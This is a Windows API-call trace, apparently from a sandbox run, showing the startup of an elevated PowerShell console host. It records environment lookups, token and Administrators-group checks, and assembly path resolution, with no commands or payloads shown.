	[0097.059] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.059] CoTaskMemFree (pv=0x28e180) 
	[0097.063] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.063] CoTaskMemFree (pv=0x28e180) 
	[0097.063] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.063] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.063] CoTaskMemFree (pv=0x28e180) 
	[0097.067] CoCreateGuid (in: pguid=0xedf28 | out: pguid=0xedf28*(Data1=0x3be50a6f, Data2=0xaa2b, Data3=0x4b7e, Data4=([0]=0xb8, [1]=0x9d, [2]=0x1a, [3]=0x9, [4]=0xc6, [5]=0x4f, [6]=0x64, [7]=0x6))) returned 0x0
	[0097.070] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.070] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.070] CoTaskMemFree (pv=0x28e180) 
	[0097.073] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.073] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.073] CoTaskMemFree (pv=0x28e180) 
	[0097.076] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.076] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.076] CoTaskMemFree (pv=0x28e180) 
	[0097.082] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xf
	[0097.133] GetConsoleScreenBufferInfo (in: hConsoleOutput=0xf, lpConsoleScreenBufferInfo=0xedbd0 | out: lpConsoleScreenBufferInfo=0xedbd0) returned 1
	[0097.138] CreateFileW (lpFileName="CONOUT$" (normalized: "conout$"), dwDesiredAccess=0xc0000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x13
	[0097.139] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x13, lpConsoleScreenBufferInfo=0xedbd0 | out: lpConsoleScreenBufferInfo=0xedbd0) returned 1
	[0097.140] GetVersionExW (in: lpVersionInformation=0xedb60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x0, dwMinorVersion=0x0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0xedb60*(dwOSVersionInfoSize=0x114, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0097.143] GetCurrentProcess () returned 0xffffffffffffffff
	[0097.144] OpenProcessToken (in: ProcessHandle=0xffffffffffffffff, DesiredAccess=0x2000000, TokenHandle=0xedbf8 | out: TokenHandle=0xedbf8*=0x320) returned 1
	[0097.148] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xedb18 | out: TokenInformation=0x0, ReturnLength=0xedb18) returned 0
	[0097.149] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1e7140
	[0097.149] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x1e7140, TokenInformationLength=0x4, ReturnLength=0xedb18 | out: TokenInformation=0x1e7140, ReturnLength=0xedb18) returned 1
	[0097.151] DuplicateTokenEx (in: hExistingToken=0x320, dwDesiredAccess=0x8, lpTokenAttributes=0x0, ImpersonationLevel=0x2, TokenType=0x2, phNewToken=0xedc78 | out: phNewToken=0xedc78*=0x31c) returned 1
	[0097.151] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0xedb18 | out: TokenInformation=0x0, ReturnLength=0xedb18) returned 0
	[0097.152] LocalAlloc (uFlags=0x0, uBytes=0x4) returned 0x1e7170
	[0097.152] GetTokenInformation (in: TokenHandle=0x320, TokenInformationClass=0x8, TokenInformation=0x1e7170, TokenInformationLength=0x4, ReturnLength=0xedb18 | out: TokenInformation=0x1e7170, ReturnLength=0xedb18) returned 1
	[0097.153] CheckTokenMembership (in: TokenHandle=0x31c, SidToCheck=0x2d02678*(Revision=0x1, SubAuthorityCount=0x2, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x20, [1]=0x0)), IsMember=0xedc88 | out: IsMember=0xedc88) returned 1
	[0097.153] CloseHandle (hObject=0x31c) returned 1
	[0097.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.153] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.154] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.325] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed630, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.330] CoTaskMemAlloc (cb=0x804) returned 0x29f040
	[0097.330] GetConsoleTitleW (in: lpConsoleTitle=0x29f040, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0097.330] CoTaskMemFree (pv=0x29f040) 
	[0097.420] CoTaskMemAlloc (cb=0x804) returned 0x1b314080
	[0097.420] GetConsoleTitleW (in: lpConsoleTitle=0x1b314080, nSize=0x400 | out: lpConsoleTitle="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 0x39
	[0097.420] CoTaskMemFree (pv=0x1b314080) 
	[0097.421] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.422] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed610, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.424] SetConsoleTitleW (lpConsoleTitle="Administrator: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe") returned 1
	[0097.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.426] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.549] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed750, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.550] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed7a0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.557] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0xed6f0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0097.725] SetConsoleCtrlHandler (HandlerRoutine=0x29e68dc, Add=1) returned 1
	[0097.752] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.752] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.752] CoTaskMemFree (pv=0x28e180) 
	[0097.767] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x324
	[0097.769] CoCreateGuid (in: pguid=0xedd70 | out: pguid=0xedd70*(Data1=0x694c35a1, Data2=0x96bb, Data3=0x4664, Data4=([0]=0x9f, [1]=0xb4, [2]=0x57, [3]=0xb6, [4]=0x22, [5]=0x2b, [6]=0x8f, [7]=0xc4))) returned 0x0
	[0097.770] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.771] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.771] CoTaskMemFree (pv=0x28e180) 
	[0097.837] WinSqmIsOptedIn () returned 0x0
	[0097.838] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.838] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.838] CoTaskMemFree (pv=0x28e180) 
	[0097.843] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.843] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.844] CoTaskMemFree (pv=0x28e180) 
	[0097.845] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.845] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.845] CoTaskMemFree (pv=0x28e180) 
	[0097.848] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.848] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.848] CoTaskMemFree (pv=0x28e180) 
	[0097.849] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.849] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.850] CoTaskMemFree (pv=0x28e180) 
	[0097.862] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.863] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.863] CoTaskMemFree (pv=0x28e180) 
	[0097.863] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.864] CoTaskMemFree (pv=0x28e180) 
	[0097.864] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.864] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.864] CoTaskMemFree (pv=0x28e180) 
	[0097.869] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.869] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.869] CoTaskMemFree (pv=0x28e180) 
	[0097.906] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.906] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.906] CoTaskMemFree (pv=0x28e180) 
	[0097.911] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.911] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.912] CoTaskMemFree (pv=0x28e180) 
	[0097.912] CoTaskMemAlloc (cb=0x104) returned 0x28e180
	[0097.912] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x28e180, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0097.913] CoTaskMemFree (pv=0x28e180) 
	[0098.579] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.580] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.851] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.852] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed1c0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0098.853] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xed110, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
